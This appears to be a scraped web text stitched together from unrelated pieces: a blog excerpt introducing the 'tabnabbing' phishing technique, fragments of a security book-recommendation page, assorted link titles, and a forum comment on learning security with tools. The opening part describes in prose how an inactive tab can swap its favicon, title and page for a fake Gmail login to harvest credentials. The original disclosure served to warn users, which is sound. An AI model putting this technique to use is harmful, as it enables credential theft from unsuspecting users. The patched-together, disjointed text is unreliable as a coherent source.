Tabnabbing: A New Type of Phishing Attack. The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples. Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.
What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. A user navigates to your normal looking site.You detect when the page has lost its focus and hasn’t been interacted with for a while.Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like.
I dub this new type of phishing attack “tabnabbing”. Targeted Attacks There are many ways to potentially improve the efficacy of this attack. Attack Vector Try it Out The Fix. Gynvael.coldwind//vx. Recommended Reading | The Homepage of @attrc. This page lists books that I have found to be highly relevant and useful for learning topics within computer security, digital forensics, incident response, malware analysis, and reverse engineering. These books range from introductory texts to advanced research works. While some of these books may seem dated, the information contained is still very useful to people learning today, and much of the information is essential to becoming proficient in the information security realm. Please note that, in order to avoid ranking individual books, each category is listed in alphabetical order and each book is listed in alphabetical order within its category. If you notice any errors with this page or have books that you think should be listed then please contact me.
I will only list books that I have personally read and for which I am willing to vouch. Application Security - Native Application Security - Web Cryptography Database Forensics Digital Forensics and Incident Response Linux Usage Networking. Schneier on Security. "Reverse Engineering for Beginners" free book. 30C3 (3/3)
From 0x90 to 0x4c454554, a journey into exploitation. CS:APP Labs. $9000 bounty paid for Python bugs. I realize there's a philosophy that it's best to start from the lowest levels and work one's way up. It's one I can empathize with, in spirit, though I disagree. The same logic means that people shouldn't use static code analysis tools, or valgrind, or even debuggers, until they acquire deep technical knowledge. While I think all of these tools help reinforce the principles. If someone starts with the fixed and unwavering goal of security analysis in mind, then perhaps I can agree with you. If however someone is only curious about security analysis, and finds that spending a year to "grok the theory" is a high barrier, then even clumsy use of semi-automated tools may provide more concrete incentive to learn the underlying skills. While I don't believe you are correct, another question is, how many white hats do we end up with?
Finally, it's also good to have even the script kiddies on the side of good than the side of lolz.